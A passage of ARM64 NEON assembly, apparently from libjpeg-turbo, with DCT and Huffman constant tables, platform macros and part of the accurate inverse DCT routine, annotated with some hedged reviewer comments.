.short -128, -128, -128, -128 /* presumably the chroma centering bias (Cb/Cr - 128) — confirm against consumer */
.short -128, -128, -128, -128
/* Constants for jsimd_*_ycc_neon() */
.balign 16
Ljsimd_rgb_ycc_neon_consts:
.short 19595, 38470, 7471, 11059
.short 21709, 32768, 27439, 5329
.short 32767, 128, 32767, 128
.short 32767, 128, 32767, 128
/* Constants for jsimd_fdct_islow_neon() */
#define F_0_298 2446 /* FIX(0.298631336) */
#define F_0_390 3196 /* FIX(0.390180644) */
#define F_0_541 4433 /* FIX(0.541196100) */
#define F_0_765 6270 /* FIX(0.765366865) */
#define F_0_899 7373 /* FIX(0.899976223) */
#define F_1_175 9633 /* FIX(1.175875602) */
#define F_1_501 12299 /* FIX(1.501321110) */
#define F_1_847 15137 /* FIX(1.847759065) */
#define F_1_961 16069 /* FIX(1.961570560) */
#define F_2_053 16819 /* FIX(2.053119869) */
#define F_2_562 20995 /* FIX(2.562915447) */
#define F_3_072 25172 /* FIX(3.072711026) */
/*
 * 16-bit fixed-point multipliers for the slow-but-accurate forward DCT:
 * FIX(x) = x * 2^13.  Same values and lane order as
 * Ljsimd_idct_islow_neon_consts above; kept as a separate table so each
 * function loads its own 32-byte-aligned constant block.  Presumably
 * consumed by jsimd_fdct_islow_neon (not in this view) via lane-indexed
 * smull/smlal, with subtracted terms stored negated.
 */
.balign 16
Ljsimd_fdct_islow_neon_consts:
.short F_0_298
.short -F_0_390
.short F_0_541
.short F_0_765
.short - F_0_899
.short F_1_175
.short F_1_501
.short - F_1_847
.short - F_1_961
.short F_2_053
.short - F_2_562
.short F_3_072
.short 0 /* padding */
.short 0
.short 0
.short 0
#undef F_0_298
#undef F_0_390
#undef F_0_541
#undef F_0_765
#undef F_0_899
#undef F_1_175
#undef F_1_501
#undef F_1_847
#undef F_1_961
#undef F_2_053
#undef F_2_562
#undef F_3_072
/* Constants for jsimd_huff_encode_one_block_neon() */
/*
 * Lookup tables for jsimd_huff_encode_one_block_neon (function not in this
 * view).  The first 16 bytes are per-lane single-bit masks (0x01..0x80,
 * repeated for both 8-byte halves).  The remaining rows appear to be TBL
 * permute indices selecting byte PAIRS of 16-bit coefficients (hence the
 * even/odd index pairs) — presumably implementing the zig-zag reordering;
 * 255 is an out-of-range index, which the TBL instruction maps to zero.
 * The trailing "Lx => Ly" comments track which source rows each table row
 * covers.  NOTE(review): confirm against the consuming function.
 */
.balign 16
Ljsimd_huff_encode_one_block_neon_consts:
.byte 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, \
0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80
.byte 0, 1, 2, 3, 16, 17, 32, 33, \
18, 19, 4, 5, 6, 7, 20, 21 /* L0 => L3 : 4 lines OK */
.byte 34, 35, 48, 49, 255, 255, 50, 51, \
36, 37, 22, 23, 8, 9, 10, 11 /* L0 => L3 : 4 lines OK */
.byte 8, 9, 22, 23, 36, 37, 50, 51, \
255, 255, 255, 255, 255, 255, 52, 53 /* L1 => L4 : 4 lines OK */
.byte 54, 55, 40, 41, 26, 27, 12, 13, \
14, 15, 28, 29, 42, 43, 56, 57 /* L0 => L3 : 4 lines OK */
.byte 6, 7, 20, 21, 34, 35, 48, 49, \
50, 51, 36, 37, 22, 23, 8, 9 /* L4 => L7 : 4 lines OK */
.byte 42, 43, 28, 29, 14, 15, 30, 31, \
44, 45, 58, 59, 255, 255, 255, 255 /* L1 => L4 : 4 lines OK */
.byte 255, 255, 255, 255, 56, 57, 42, 43, \
28, 29, 14, 15, 30, 31, 44, 45 /* L3 => L6 : 4 lines OK */
.byte 26, 27, 40, 41, 42, 43, 28, 29, \
14, 15, 30, 31, 44, 45, 46, 47 /* L5 => L7 : 3 lines OK */
.byte 255, 255, 255, 255, 0, 1, 255, 255, \
255, 255, 255, 255, 255, 255, 255, 255 /* L4 : 1 lines OK */
.byte 255, 255, 255, 255, 255, 255, 255, 255, \
0, 1, 16, 17, 2, 3, 255, 255 /* L5 => L6 : 2 lines OK */
.byte 255, 255, 255, 255, 255, 255, 255, 255, \
255, 255, 255, 255, 8, 9, 22, 23 /* L5 => L6 : 2 lines OK */
.byte 4, 5, 6, 7, 255, 255, 255, 255, \
255, 255, 255, 255, 255, 255, 255, 255 /* L7 : 1 line OK */
.text
/*****************************************************************************/
/* Supplementary macro for setting function attributes */
/*
 * asm_function fname — declare and define the entry label of an exported
 * assembly function, handling platform symbol conventions:
 *   - Apple/Mach-O: C-visible symbols carry a leading underscore;
 *     .private_extern keeps the symbol out of the dynamic export table.
 *   - ELF: .hidden prevents export from a shared object, and
 *     .type %function marks the symbol as code for linkers/tools.
 */
.macro asm_function fname
#ifdef __APPLE__
.private_extern _\fname
.globl _\fname
_\fname:
#else
.global \fname
#ifdef __ELF__
.hidden \fname
.type \fname, %function
#endif
\fname:
#endif
.endm
/* Get symbol location */
/*
 * get_symbol_loc reg, symbol — load the address of \symbol into \reg
 * PC-relatively (adrp to get the 4 KB page, then add the low 12 bits).
 * Mach-O spells the relocations @PAGE/@PAGEOFF; ELF uses :lo12:.
 */
.macro get_symbol_loc reg, symbol
#ifdef __APPLE__
adrp \reg, \symbol@PAGE
add \reg, \reg, \symbol@PAGEOFF
#else
adrp \reg, \symbol
add \reg, \reg, :lo12:\symbol
#endif
.endm
/*
 * transpose_8x8 l0..l7, t0..t3 — in-place transpose of an 8x8 matrix of
 * 16-bit elements.  \l0-\l7 each hold one row as a .8h vector; \t0-\t3
 * are scratch.  Classic three-stage butterfly: interleave at 16-bit
 * granularity (trn1/trn2 .8h), then 32-bit (.4s), then 64-bit (.2d).
 * On exit \l0-\l7 hold the transposed rows; the scratch registers are
 * clobbered.
 */
.macro transpose_8x8 l0, l1, l2, l3, l4, l5, l6, l7, t0, t1, t2, t3
/* stage 1: pair up adjacent rows at halfword granularity */
trn1 \t0\().8h, \l0\().8h, \l1\().8h
trn1 \t1\().8h, \l2\().8h, \l3\().8h
trn1 \t2\().8h, \l4\().8h, \l5\().8h
trn1 \t3\().8h, \l6\().8h, \l7\().8h
trn2 \l1\().8h, \l0\().8h, \l1\().8h
trn2 \l3\().8h, \l2\().8h, \l3\().8h
trn2 \l5\().8h, \l4\().8h, \l5\().8h
trn2 \l7\().8h, \l6\().8h, \l7\().8h
/* stage 2: interleave 2x2 blocks at word granularity */
trn1 \l4\().4s, \t2\().4s, \t3\().4s
trn2 \t3\().4s, \t2\().4s, \t3\().4s
trn1 \t2\().4s, \t0\().4s, \t1\().4s
trn2 \l2\().4s, \t0\().4s, \t1\().4s
trn1 \t0\().4s, \l1\().4s, \l3\().4s
trn2 \l3\().4s, \l1\().4s, \l3\().4s
trn2 \t1\().4s, \l5\().4s, \l7\().4s
trn1 \l5\().4s, \l5\().4s, \l7\().4s
/* stage 3: combine 4x4 blocks at doubleword granularity */
trn2 \l6\().2d, \l2\().2d, \t3\().2d
trn1 \l0\().2d, \t2\().2d, \l4\().2d
trn1 \l1\().2d, \t0\().2d, \l5\().2d
trn2 \l7\().2d, \l3\().2d, \t1\().2d
trn1 \l2\().2d, \l2\().2d, \t3\().2d
trn2 \l4\().2d, \t2\().2d, \l4\().2d
trn1 \l3\().2d, \l3\().2d, \t1\().2d
trn2 \l5\().2d, \t0\().2d, \l5\().2d
.endm
#define CENTERJSAMPLE 128
/*****************************************************************************/
/*
* Perform dequantization and inverse DCT on one block of coefficients.
*
* GLOBAL(void)
* jsimd_idct_islow_neon(void *dct_table, JCOEFPTR coef_block,
* JSAMPARRAY output_buf, JDIMENSION output_col)
*/
#define CONST_BITS 13
#define PASS1_BITS 2
#define XFIX_P_0_298 v0.h[0]
#define XFIX_N_0_390 v0.h[1]
#define XFIX_P_0_541 v0.h[2]
#define XFIX_P_0_765 v0.h[3]
#define XFIX_N_0_899 v0.h[4]
#define XFIX_P_1_175 v0.h[5]
#define XFIX_P_1_501 v0.h[6]
#define XFIX_N_1_847 v0.h[7]
#define XFIX_N_1_961 v1.h[0]
#define XFIX_P_2_053 v1.h[1]
#define XFIX_N_2_562 v1.h[2]
#define XFIX_P_3_072 v1.h[3]
asm_function jsimd_idct_islow_neon
DCT_TABLE .req x0
COEF_BLOCK .req x1
OUTPUT_BUF .req x2
OUTPUT_COL .req x3
TMP1 .req x0
TMP2 .req x1
TMP3 .req x9
TMP4 .req x10
TMP5 .req x11
TMP6 .req x12
TMP7 .req x13
TMP8 .req x14
/* OUTPUT_COL is a JDIMENSION (unsigned int) argument, so the ABI doesn't
guarantee that the upper (unused) 32 bits of x3 are valid. This
instruction ensures that those bits are set to zero. */
uxtw x3, w3
sub sp, sp, #64
get_symbol_loc x15, Ljsimd_idct_islow_neon_consts
mov x10, sp
st1 {v8.8b, v9.8b, v10.8b, v11.8b}, [x10], #32
st1 {v12.8b, v13.8b, v14.8b, v15.8b}, [x10], #32
ld1 {v0.8h, v1.8h}, [x15]
ld1 {v2.8h, v3.8h, v4.8h, v5.8h}, [COEF_BLOCK], #64
ld1 {v18.8h, v19.8h, v20.8h, v21.8h}, [DCT_TABLE], #64
ld1 {v6.8h, v7.8h, v8.8h, v9.8h}, [COEF_BLOCK], #64
ld1 {v22.8h, v23.8h, v24.8h, v25.8h}, [DCT_TABLE], #64
cmeq v16.8h, v3.8h, #0
cmeq v26.8h, v4.8h, #0
cmeq v27.8h, v5.8h, #0
cmeq v28.8h, v6.8h, #0
cmeq v29.8h, v7.8h, #0
cmeq v30.8h, v8.8h, #0
cmeq v31.8h, v9.8h, #0
and v10.16b, v16.16b, v26.16b
and v11.16b, v27.16b, v28.16b
and v12.16b, v29.16b, v30.16b
and v13.16b, v31.16b, v10.16b
and v14.16b, v11.16b, v12.16b
mul v2.8h, v2.8h, v18.8h
and v15.16b, v13.16b, v14.16b
shl v10.8h, v2.8h, #(PASS1_BITS)
sqxtn v16.8b, v15.8h
mov TMP1, v16.d[0]
mvn TMP2, TMP1
cbnz TMP2, 2f
/* case all AC coeffs are zeros */
dup v2.2d, v10.d[0]
dup v6.2d, v10.d[1]
mov v3.16b, v2.16b
mov v7.16b, v6.16b
mov v4.16b, v2.16b
mov v8.16b, v6.16b
mov v5.16b, v2.16b
mov v9.16b, v6.16b
1:
/* for this transpose, we should organise data like this:
* 00, 01, 02, 03, 40, 41, 42, 43
* 10, 11, 12, 13, 50, 51, 52, 53
* 20, 21, 22, 23, 60, 61, 62, 63
* 30, 31, 32, 33, 70, 71, 72, 73
* 04, 05, 06, 07, 44, 45, 46, 47
* 14, 15, 16, 17, 54, 55, 56, 57
* 24, 25, 26, 27, 64, 65, 66, 67
* 34, 35, 36, 37, 74, 75, 76, 77
*/
trn1 v28.8h, v2.8h, v3.8h
trn1 v29.8h, v4.8h, v5.8h
trn1 v30.8h, v6.8h, v7.8h
trn1 v31.8h, v8.8h, v9.8h
trn2 v16.8h, v2.8h, v3.8h
trn2 v17.8h, v4.8h, v5.8h
trn2 v18.8h, v6.8h, v7.8h
trn2 v19.8h, v8.8h, v9.8h
trn1 v2.4s, v28.4s, v29.4s
trn1 v6.4s, v30.4s, v31.4s
trn1 v3.4s, v16.4s, v17.4s
trn1 v7.4s, v18.4s, v19.4s
trn2 v4.4s, v28.4s, v29.4s
trn2 v8.4s, v30.4s, v31.4s
trn2 v5.4s, v16.4s, v17.4s
trn2 v9.4s, v18.4s, v19.4s
/* Even part: reverse the even part of the forward DCT. */
add v18.8h, v4.8h, v8.8h /* z2 + z3 = DEQUANTIZE(inptr[DCTSIZE*2], quantptr[DCTSIZE*2]) + DEQUANTIZE(inptr[DCTSIZE*6], quantptr[DCTSIZE*6]) */
add v22.8h, v2.8h, v6.8h /* z2 + z3 = DEQUANTIZE(inptr[DCTSIZE*0], quantptr[DCTSIZE*0]) + DEQUANTIZE(inptr[DCTSIZE*4], quantptr[DCTSIZE*4]) */
smull2 v19.4s, v18.8h, XFIX_P_0_541 /* z1h z1 = MULTIPLY(z2 + z3, FIX_0_541196100); */
sub v26.8h, v2.8h, v6.8h /* z2 - z3 = DEQUANTIZE(inptr[DCTSIZE*0], quantptr[DCTSIZE*0]) - DEQUANTIZE(inptr[DCTSIZE*4], quantptr[DCTSIZE*4]) */
smull v18.4s, v18.4h, XFIX_P_0_541 /* z1l z1 = MULTIPLY(z2 + z3, FIX_0_541196100); */
sshll2 v23.4s, v22.8h, #(CONST_BITS) /* tmp0h tmp0 = LEFT_SHIFT(z2 + z3, CONST_BITS); */
mov v21.16b, v19.16b /* tmp3 = z1 */
mov v20.16b, v18.16b /* tmp3 = z1 */
smlal2 v19.4s, v8.8h, XFIX_N_1_847 /* tmp2h tmp2 = z1 + MULTIPLY(z3, -FIX_1_847759065); */
smlal v18.4s, v8.4h, XFIX_N_1_847 /* tmp2l tmp2 = z1 + MULTIPLY(z3, -FIX_1_847759065); */
sshll2 v27.4s, v26.8h, #(CONST_BITS) /* tmp1h tmp1 = LEFT_SHIFT(z2 - z3, CONST_BITS); */
smlal2 v21.4s, v4.8h, XFIX_P_0_765 /* tmp3h tmp3 = z1 + MULTIPLY(z2, FIX_0_765366865); */
smlal v20.4s, v4.4h, XFIX_P_0_765 /* tmp3l tmp3 = z1 + MULTIPLY(z2, FIX_0_765366865); */
sshll v22.4s, v22.4h, #(CONST_BITS) /* tmp0l tmp0 = LEFT_SHIFT(z2 + z3, CONST_BITS); */
sshll v26.4s, v26.4h, #(CONST_BITS) /* tmp1l tmp1 = LEFT_SHIFT(z2 - z3, CONST_BITS); */
add v2.4s, v22.4s, v20.4s /* tmp10l tmp10 = tmp0 + tmp3; */
sub v6.4s, v22.4s, v20.4s /* tmp13l tmp13 = tmp0 - tmp3; */
add v8.4s, v26.4s, v18.4s /* tmp11l tmp11 = tmp1 + tmp2; */
sub v4.4s, v26.4s, v18.4s /* tmp12l tmp12 = tmp1 - tmp2; */
add v28.4s, v23.4s, v21.4s /* tmp10h tmp10 = tmp0 + tmp3; */
sub v31.4s, v23.4s, v21.4s /* tmp13h tmp13 = tmp0 - tmp3; */
add v29.4s, v27.4s, v19.4s /* tmp11h tmp11 = tmp1 + tmp2; */
sub v30.4s, v27.4s, v19.4s /* tmp12h tmp12 = tmp1 - tmp2; */
/* Odd part per figure 8; the matrix is unitary and hence its
* transpose is its inverse. i0..i3 are y7,y5,y3,y1 respectively.
*/
add v22.8h, v9.8h, v5.8h /* z3 = tmp0 + tmp2 = DEQUANTIZE(inptr[DCTSIZE*7], quantptr[DCTSIZE*7]) + DEQUANTIZE(inptr[DCTSIZE*3], quantptr[DCTSIZE*3]) */
add v24.8h, v7.8h, v3.8h /* z4 = tmp1 + tmp3 = DEQUANTIZE(inptr[DCTSIZE*5], quantptr[DCTSIZE*5]) + DEQUANTIZE(inptr[DCTSIZE*1], quantptr[DCTSIZE*1]) */
add v18.8h, v9.8h, v3.8h /* z1 = tmp0 + tmp3 = DEQUANTIZE(inptr[DCTSIZE*7], quantptr[DCTSIZE*7]) + DEQUANTIZE(inptr[DCTSIZE*1], quantptr[DCTSIZE*1]) */
add v20.8h, v7.8h, v5.8h /* z2 = tmp1 + tmp2 = DEQUANTIZE(inptr[DCTSIZE*5], quantptr[DCTSIZE*5]) + DEQUANTIZE(inptr[DCTSIZE*3], quantptr[DCTSIZE*3]) */
add v26.8h, v22.8h, v24.8h /* z5 = z3 + z4 */
smull2 v11.4s, v9.8h, XFIX_P_0_298 /* tmp0 = MULTIPLY(tmp0, FIX_0_298631336) */
smull2 v13.4s, v7.8h, XFIX_P_2_053 /* tmp1 = MULTIPLY(tmp1, FIX_2_053119869) */
smull2 v15.4s, v5.8h, XFIX_P_3_072 /* tmp2 = MULTIPLY(tmp2, FIX_3_072711026) */
smull2 v17.4s, v3.8h, XFIX_P_1_501 /* tmp3 = MULTIPLY(tmp3, FIX_1_501321110) */
smull2 v27.4s, v26.8h, XFIX_P_1_175 /* z5h z5 = MULTIPLY(z3 + z4, FIX_1_175875602) */
smull2 v23.4s, v22.8h, XFIX_N_1_961 /* z3 = MULTIPLY(z3, -FIX_1_961570560) */
smull2 v25.4s, v24.8h, XFIX_N_0_390 /* z4 = MULTIPLY(z4, -FIX_0_390180644) */
smull2 v19.4s, v18.8h, XFIX_N_0_899 /* z1 = MULTIPLY(z1, -FIX_0_899976223) */
smull2 v21.4s, v20.8h, XFIX_N_2_562 /* z2 = MULTIPLY(z2, -FIX_2_562915447) */
smull v10.4s, v9.4h, XFIX_P_0_298 /* tmp0 = MULTIPLY(tmp0, FIX_0_298631336) */
smull v12.4s, v7.4h, XFIX_P_2_053 /* tmp1 = MULTIPLY(tmp1, FIX_2_053119869) */
smull v14.4s, v5.4h, XFIX_P_3_072 /* tmp2 = MULTIPLY(tmp2, FIX_3_072711026) */
smull v16.4s, v3.4h, XFIX_P_1_501 /* tmp3 = MULTIPLY(tmp3, FIX_1_501321110) */
smull v26.4s, v26.4h, XFIX_P_1_175 /* z5l z5 = MULTIPLY(z3 + z4, FIX_1_175875602) */
smull v22.4s, v22.4h, XFIX_N_1_961 /* z3 = MULTIPLY(z3, -FIX_1_961570560) */
smull v24.4s, v24.4h, XFIX_N_0_390 /* z4 = MULTIPLY(z4, -FIX_0_390180644) */
smull v18.4s, v18.4h, XFIX_N_0_899 /* z1 = MULTIPLY(z1, -FIX_0_899976223) */
smull v20.4s, v20.4h, XFIX_N_2_562 /* z2 = MULTIPLY(z2, -FIX_2_562915447) */
add v23.4s, v23.4s, v27.4s /* z3 += z5 */
add v22.4s, v22.4s, v26.4s /* z3 += z5 */
add v25.4s, v25.4s, v27.4s /* z4 += z5 */
add v24.4s, v24.4s, v26.4s /* z4 += z5 */
add v11.4s, v11.4s, v19.4s /* tmp0 += z1 */
add v10.4s, v10.4s, v18.4s /* tmp0 += z1 */
add v13.4s, v13.4s, v21.4s /* tmp1 += z2 */
add v12.4s, v12.4s, v20.4s /* tmp1 += z2 */
add v15.4s, v15.4s, v21.4s /* tmp2 += z2 */
add v14.4s, v14.4s, v20.4s /* tmp2 += z2 */
add v17.4s, v17.4s, v19.4s /* tmp3 += z1 */
add v16.4s, v16.4s, v18.4s /* tmp3 += z1 */
add v11.4s, v11.4s, v23.4s /* tmp0 += z3 */
add v10.4s, v10.4s, v22.4s /* tmp0 += z3 */
add v13.4s, v13.4s, v25.4s /* tmp1 += z4 */
add v12.4s, v12.4s, v24.4s /* tmp1 += z4 */
add v17.4s, v17.4s, v25.4s /* tmp3 += z4 */
add v16.4s, v16.4s, v24.4s /* tmp3 += z4 */
add v15.4s, v15.4s, v23.4s /* tmp2 += z3 */
add v14.4s, v14.4s, v22.4s /* tmp2 += z3 */
/* Final output stage: inputs are tmp10..tmp13, tmp0..tmp3 */
add v18.4s, v2.4s, v16.4s /* tmp10 + tmp3 */
add v19.4s, v28.4s, v17.4s /* tmp10 + tmp3 */
sub v20.4s, v2.4s, v16.4s /* tmp10 - tmp3 */
sub v21.4s, v28.4s, v17.4s /* tmp10 - tmp3 */
add v22.4s, v8.4s, v14.4s /* tmp11 + tmp2 */
add v23.4s, v29.4s, v15.4s /* tmp11 + tmp2 */
sub v24.4s, v8.4s, v14.4s /* tmp11 - tmp2 */
sub v25.4s, v29.4s, v15.4s /* tmp11 - tmp2 */
add v26.4s, v4.4s, v12.4s /* tmp12 + tmp1 */
add v27.4s, v30.4s, v13.4s /* tmp12 + tmp1 */
sub v28.4s, v4.4s, v12.4s /* tmp12 - tmp1 */
sub v29.4s, v30.4s, v13.4s /* tmp12 - tmp1 */
add v14.4s, v6.4s, v10.4s /* tmp13 + tmp0 */
add v15.4s, v31.4s, v11.4s /* tmp13 + tmp0 */
sub v16.4s, v6.4s, v10.4s /* tmp13 - tmp0 */
sub v17.4s, v31.4s, v11.4s /* tmp13 - tmp0 */
shrn v2.4h, v18.4s, #16 /* wsptr[DCTSIZE*0] = (int)DESCALE(tmp10 + tmp3, CONST_BITS+PASS1_BITS+3) */
shrn v9.4h, v20.4s, #16 /* wsptr[DCTSIZE*7] = (int)DESCALE(tmp10 - tmp3, CONST_BITS+PASS1_BITS+3) */
shrn v3.4h, v22.4s, #16 /* wsptr[DCTSIZE*1] = (int)DESCALE(tmp11 + tmp2, CONST_BITS+PASS1_BITS+3) */
shrn v8.4h, v24.4s, #16 /* wsptr[DCTSIZE*6] = (int)DESCALE(tmp11 - tmp2, CONST_BITS+PASS1_BITS+3) */
shrn v4.4h, v26.4s, #16 /* wsptr[DCTSIZE*2] = (int)DESCALE(tmp12 + tmp1, CONST_BITS+PASS1_BITS+3) */
shrn v7.4h, v28.4s, #16 /* wsptr[DCTSIZE*5] = (int)DESCALE(tmp12 - tmp1, CONST_BITS+PASS1_BITS+3) */
shrn v5.4h, v14.4s, #16 /* wsptr[DCTSIZE*3] = (int)DESCALE(tmp13 + tmp0, CONST_BITS+PASS1_BITS+3) */
shrn v6.4h, v16.4s, #16 /* wsptr[DCTSIZE*4] = (int)DESCALE(tmp13 - tmp0, CONST_BITS+PASS1_BITS+3) */
shrn2 v2.8h, v19.4s, #16 /* wsptr[DCTSIZE*0] = (int)DESCALE(tmp10 + tmp3, CONST_BITS+PASS1_BITS+3) */
shrn2 v9.8h, v21.4s, #16 /* wsptr[DCTSIZE*7] = (int)DESCALE(tmp10 - tmp3, CONST_BITS+PASS1_BITS+3) */
shrn2 v3.8h, v23.4s, #16 /* wsptr[DCTSIZE*1] = (int)DESCALE(tmp11 + tmp2, CONST_BITS+PASS1_BITS+3) */
shrn2 v8.8h, v25.4s, #16 /* wsptr[DCTSIZE*6] = (int)DESCALE(tmp11 - tmp2, CONST_BITS+PASS1_BITS+3) */
shrn2 v4.8h, v27.4s, #16 /* wsptr[DCTSIZE*2] = (int)DESCALE(tmp12 + tmp1, CONST_BITS+PASS1_BITS+3) */
shrn2 v7.8h, v29.4s, #16 /* wsptr[DCTSIZE*5] = (int)DESCALE(tmp12 - tmp1, CONST_BITS+PASS1_BITS+3) */
shrn2 v5.8h, v15.4s, #16 /* wsptr[DCTSIZE*3] = (int)DESCALE(tmp13 + tmp0, CONST_BITS+PASS1_BITS+3) */
shrn2 v6.8h, v17.4s, #16 /* wsptr[DCTSIZE*4] = (int)DESCALE(tmp13 - tmp0, CONST_BITS+PASS1_BITS+3) */
movi v0.16b, #(CENTERJSAMPLE)
/* Prepare pointers (dual-issue with Neon instructions) */
ldp TMP1, TMP2, [OUTPUT_BUF], 16
sqrshrn v28.8b, v2.8h, #(CONST_BITS + PASS1_BITS + 3 - 16)
ldp TMP3, TMP4, [OUTPUT_BUF], 16
sqrshrn v29.8b, v3.8h, #(CONST_BITS + PASS1_BITS + 3 - 16)
add TMP1, TMP1, OUTPUT_COL
sqrshrn v30.8b, v4.8h, #(CONST_BITS + PASS1_BITS + 3 - 16)
add TMP2, TMP2, OUTPUT_COL
sqrshrn v31.8b, v5.8h, #(CONST_BITS + PASS1_BITS + 3 - 16)
add TMP3, TMP3, OUTPUT_COL
sqrshrn2 v28.16b, v6.8h, #(CONST_BITS + PASS1_BITS + 3 - 16)
add TMP4, TMP4, OUTPUT_COL
sqrshrn2 v29.16b, v7.8h, #(CONST_BITS + PASS1_BITS + 3 - 16)
ldp TMP5, TMP6, [OUTPUT_BUF], 16
sqrshrn2 v30.16b, v8.8h, #(CONST_BITS + PASS1_BITS + 3 - 16)
ldp TMP7, TMP8, [OUTPUT_BUF], 16
sqrshrn2 v31.16b, v9.8h, #(CONST_BITS + PASS1_BITS + 3 - 16)
add TMP5, TMP5, OUTPUT_COL
add v16.16b, v28.16b, v0.16b
add TMP6, TMP6, OUTPUT_COL
add v18.16b, v29.16b, v0.16b
add TMP7, TMP7, OUTPUT_COL
add v20.16b, v30.16b, v0.16b
add TMP8, TMP8, OUTPUT_COL
add v22.16b, v31.16b, v0.16b
/* Transpose the final 8-bit samples */
trn1 v28.16b, v16.16b, v18.16b
trn1 v30.16b, v20.16b, v22.16b
trn2 v29.16b, v16.16b, v18.16b
trn2 v31.16b, v20.16b, v22.16b
trn1 v16.8h, v28.8h, v30.8h
trn2 v18.8h, v28.8h, v30.8h
trn1 v20.8h, v29.8h, v31.8h
trn2 v22.8h, v29.8h, v31.8h
uzp1 v28.4s, v16.4s, v18.4s
uzp2 v30.4s, v16.4s, v18.4s
uzp1 v29.4s, v20.4s, v22.4s
uzp2 v31.4s, v20.4s, v22.4s
/* Store results to the output buffer */
st1 {v28.d}[0], [TMP1]
st1 {v29.d}[0], [TMP2]
st1 {v28.d}[1], [TMP3]
st1 {v29.d}[1], [TMP4]
st1 {v30.d}[0], [TMP5]
st1 {v31.d}[0], [TMP6]
st1 {v30.d}[1], [TMP7]
st1 {v31.d}[1], [TMP8]
ld1 {v8.8b, v9.8b, v10.8b, v11.8b}, [sp], #32
ld1 {v12.8b, v13.8b, v14.8b, v15.8b}, [sp], #32
blr x30
.balign 16
2:
mul v3.8h, v3.8h, v19.8h
mul v4.8h, v4.8h, v20.8h
mul v5.8h, v5.8h, v21.8h
add TMP4, xzr, TMP2, LSL #32
mul v6.8h, v6.8h, v22.8h
mul v7.8h, v7.8h, v23.8h
adds TMP3, xzr, TMP2, LSR #32
mul v8.8h, v8.8h, v24.8h
mul v9.8h, v9.8h, v25.8h
b.ne 3f
/* Right AC coef is zero */
dup v15.2d, v10.d[1]
/* Even part: reverse the even part of the forward DCT. */
add v18.4h, v4.4h, v8.4h /* z2 + z3 = DEQUANTIZE(inptr[DCTSIZE*2], quantptr[DCTSIZE*2]) + DEQUANTIZE(inptr[DCTSIZE*6], quantptr[DCTSIZE*6]) */
add v22.4h, v2.4h, v6.4h /* z2 + z3 = DEQUANTIZE(inptr[DCTSIZE*0], quantptr[DCTSIZE*0]) + DEQUANTIZE(inptr[DCTSIZE*4], quantptr[DCTSIZE*4]) */
sub v26.4h, v2.4h, v6.4h /* z2 - z3 = DEQUANTIZE(inptr[DCTSIZE*0], quantptr[DCTSIZE*0]) - DEQUANTIZE(inptr[DCTSIZE*4], quantptr[DCTSIZE*4]) */
smull v18.4s, v18.4h, XFIX_P_0_541 /* z1l z1 = MULTIPLY(z2 + z3, FIX_0_541196100); */
sshll v22.4s, v22.4h, #(CONST_BITS) /* tmp0l tmp0 = LEFT_SHIFT(z2 + z3, CONST_BITS); */
mov v20.16b, v18.16b /* tmp3 = z1 */
sshll v26.4s, v26.4h, #(CONST_BITS) /* tmp1l tmp1 = LEFT_SHIFT(z2 - z3, CONST_BITS); */
smlal v18.4s, v8.4h, XFIX_N_1_847 /* tmp2l tmp2 = z1 + MULTIPLY(z3, -FIX_1_847759065); */
smlal v20.4s, v4.4h, XFIX_P_0_765 /* tmp3l tmp3 = z1 + MULTIPLY(z2, FIX_0_765366865); */
add v2.4s, v22.4s, v20.4s /* tmp10l tmp10 = tmp0 + tmp3; */
sub v6.4s, v22.4s, v20.4s /* tmp13l tmp13 = tmp0 - tmp3; */
add v8.4s, v26.4s, v18.4s /* tmp11l tmp11 = tmp1 + tmp2; */
sub v4.4s, v26.4s, v18.4s /* tmp12l tmp12 = tmp1 - tmp2; */
/* Odd part per figure 8; the matrix is unitary and hence its
* transpose is its inverse. i0..i3 are y7,y5,y3,y1 respectively.
*/
add v22.4h, v9.4h, v5.4h /* z3 = tmp0 + tmp2 = DEQUANTIZE(inptr[DCTSIZE*7], quantptr[DCTSIZE*7]) + DEQUANTIZE(inptr[DCTSIZE*3], quantptr[DCTSIZE*3]) */
add v24.4h, v7.4h, v3.4h /* z4 = tmp1 + tmp3 = DEQUANTIZE(inptr[DCTSIZE*5], quantptr[DCTSIZE*5]) + DEQUANTIZE(inptr[DCTSIZE*1], quantptr[DCTSIZE*1]) */
add v18.4h, v9.4h, v3.4h /* z1 = tmp0 + tmp3 = DEQUANTIZE(inptr[DCTSIZE*7], quantptr[DCTSIZE*7]) + DEQUANTIZE(inptr[DCTSIZE*1], quantptr[DCTSIZE*1]) */
add v20.4h, v7.4h, v5.4h /* z2 = tmp1 + tmp2 = DEQUANTIZE(inptr[DCTSIZE*5], quantptr[DCTSIZE*5]) + DEQUANTIZE(inptr[DCTSIZE*3], quantptr[DCTSIZE*3]) */
add v26.4h, v22.4h, v24.4h /* z5 = z3 + z4 */
smull v10.4s, v9.4h, XFIX_P_0_298 /* tmp0 = MULTIPLY(tmp0, FIX_0_298631336) */
smull v12.4s, v7.4h, XFIX_P_2_053 /* tmp1 = MULTIPLY(tmp1, FIX_2_053119869) */
smull v14.4s, v5.4h, XFIX_P_3_072 /* tmp2 = MULTIPLY(tmp2, FIX_3_072711026) */
smull v16.4s, v3.4h, XFIX_P_1_501 /* tmp3 = MULTIPLY(tmp3, FIX_1_501321110) */
smull v26.4s, v26.4h, XFIX_P_1_175 /* z5l z5 = MULTIPLY(z3 + z4, FIX_1_175875602) */
smull v22.4s, v22.4h, XFIX_N_1_961 /* z3 = MULTIPLY(z3, -FIX_1_961570560) */
smull v24.4s, v24.4h, XFIX_N_0_390 /* z4 = MULTIPLY(z4, -FIX_0_390180644) */
smull v18.4s, v18.4h, XFIX_N_0_899 /* z1 = MULTIPLY(z1, -FIX_0_899976223) */
smull v20.4s, v20.4h, XFIX_N_2_562 /* z2 = MULTIPLY(z2, -FIX_2_562915447) */
add v22.4s, v22.4s, v26.4s /* z3 += z5 */
add v24.4s, v24.4s, v26.4s /* z4 += z5 */
add v10.4s, v10.4s, v18.4s /* tmp0 += z1 */
add v12.4s, v12.4s, v20.4s /* tmp1 += z2 */
add v14.4s, v14.4s, v20.4s /* tmp2 += z2 */
add v16.4s, v16.4s, v18.4s /* tmp3 += z1 */
add v10.4s, v10.4s, v22.4s /* tmp0 += z3 */
add v12.4s, v12.4s, v24.4s /* tmp1 += z4 */
add v16.4s, v16.4s, v24.4s /* tmp3 += z4 */
add v14.4s, v14.4s, v22.4s /* tmp2 += z3 */
